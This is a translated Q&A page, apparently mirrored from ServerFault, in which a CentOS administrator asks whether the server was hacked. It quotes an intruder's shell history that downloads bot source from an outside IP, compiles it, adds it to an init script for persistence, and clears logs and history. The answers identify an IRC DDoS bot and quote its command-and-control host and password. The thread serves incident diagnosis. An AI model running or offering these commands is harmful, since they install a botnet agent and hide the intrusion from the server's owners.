AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • 主页
  • 系统&网络
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • 主页
  • 系统&网络
    • 最新
    • 热门
    • 标签
  • Ubuntu
    • 最新
    • 热门
    • 标签
  • Unix
    • 最新
    • 标签
  • DBA
    • 最新
    • 标签
  • Computer
    • 最新
    • 标签
  • Coding
    • 最新
    • 标签
主页 / server / 问题 / 111682
Accepted
Josef van Niekerk
Josef van Niekerk
Asked: 2010-02-11 12:01:01 +0800 CST2010-02-11 12:01:01 +0800 CST 2010-02-11 12:01:01 +0800 CST

我的网络服务器是否受到威胁?[复制]

  • 772
这个问题在这里已经有了答案:
如何处理受损的服务器? (13 个回答)
9 年前关闭。

我们今天使用 Putty 远程登录到我们的 CentOS 服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下内容:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(为清楚起见,&& 用换行符替换)

我从来没有运行过这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即更改了我的 root 密码,但希望有人能对这里发生的事情有所了解。

我看到源代码中提到了 ddos​​ bot,我和我的同事都非常担心!

提前致谢!

centos
  • 6 6 个回答
  • 921 Views

6 个回答

  • Voted
  1. Best Answer
    Rook
    2010-02-11T12:06:16+08:002010-02-11T12:06:16+08:00

    是的,你被黑了。黑客安装了一个 IRC 后门,你正在连接到这个 IRC 服务器:

    const  int port      = 1254; 
    const char channel[] = "#test";
    const char password[]= "pass";
    const char server[]  = "heathen.cc";
    

    bot herder 可以在您的服务器上执行任何命令。我建议立即关闭服务器并重新安装。该机器人具有一些 DDoS 攻击功能,DNS 洪水、同步洪水和 ICMP 洪水。它也适用于非常酷的 Windows。有一个非常古老的传播模块可以感染 myDoom。这看起来像一些旧的恶意软件。

    • 7
  2. Pekka
    2010-02-11T12:05:07+08:002010-02-11T12:05:07+08:00

    无论如何,答案是肯定的,您的服务器正在或已经被入侵。

    您应该立即切断与服务器的 Internet 连接,进行完整备份(请记住其他文件也可能遭到破坏),然后重新安装。

    此外,您可能希望通知运行僵尸网络(或其他任何网络)的 IP 的所有者。这是RIPE whois 数据。

    • 6
  3. Peter D
    2010-02-11T12:06:16+08:002010-02-11T12:06:16+08:00

    绝不允许通过 SSH 进行 root 登录。

    • 1
  4. cherouvim
    2010-02-11T12:03:29+08:002010-02-11T12:03:29+08:00

    你的问题的答案是:YES

    • 0
  5. ta.speot.is
    2010-02-11T13:40:46+08:002010-02-11T13:40:46+08:00

    听起来你已经感染了BOT_VERSIONwhere BOT_VERSIONis

    #define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

    你的 Linux 防病毒软件没有选择这个吗?

    • 0
  6. jbroome
    2010-02-11T13:59:31+08:002010-02-11T13:59:31+08:00

    我可能会在发布之前清理 C&C 机器的 IP 地址。

    • 0

相关问题

  • 如何在 Linux 机器上找到有关硬件的详细信息?

  • 使用 crontab 和 /etc/cron.hourly,daily,weekly 的区别

  • 持续监控许多服务器运行状况的简单方法?

  • Hudson 无法在 tomcat5 中启动

  • CentOS 的依赖挑战

Sidebar

Stats

  • 问题 205573
  • 回答 270741
  • 最佳答案 135370
  • 用户 68524
  • 热门
  • 回答
  • Marko Smith

    新安装后 postgres 的默认超级用户用户名/密码是什么?

    • 5 个回答
  • Marko Smith

    SFTP 使用什么端口?

    • 6 个回答
  • Marko Smith

    从 IP 地址解析主机名

    • 8 个回答
  • Marko Smith

    如何按大小对 du -h 输出进行排序

    • 30 个回答
  • Marko Smith

    命令行列出 Windows Active Directory 组中的用户?

    • 9 个回答
  • Marko Smith

    什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同?

    • 3 个回答
  • Marko Smith

    如何确定bash变量是否为空?

    • 15 个回答
  • Martin Hope
    MikeN 在 Nginx 中,如何在维护子域的同时将所有 http 请求重写为 https? 2009-09-22 06:04:43 +0800 CST
  • Martin Hope
    Tom Feiner 如何按大小对 du -h 输出进行排序 2009-02-26 05:42:42 +0800 CST
  • Martin Hope
    0x89 bash中的双方括号和单方括号有什么区别? 2009-08-10 13:11:51 +0800 CST
  • Martin Hope
    Kyle Brandt IPv4 子网如何工作? 2009-08-05 06:05:31 +0800 CST
  • Martin Hope
    Noah Goodrich 什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同? 2009-05-19 18:24:42 +0800 CST
  • Martin Hope
    Brent 如何确定bash变量是否为空? 2009-05-13 09:54:48 +0800 CST
  • Martin Hope
    cletus 您如何找到在 Windows 中打开文件的进程? 2009-05-01 16:47:16 +0800 CST

热门标签

linux nginx windows networking ubuntu domain-name-system amazon-web-services active-directory apache-2.4 ssh

Explore

  • 主页
  • 问题
    • 最新
    • 热门
  • 标签
  • 帮助

Footer

AskOverflow.Dev

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve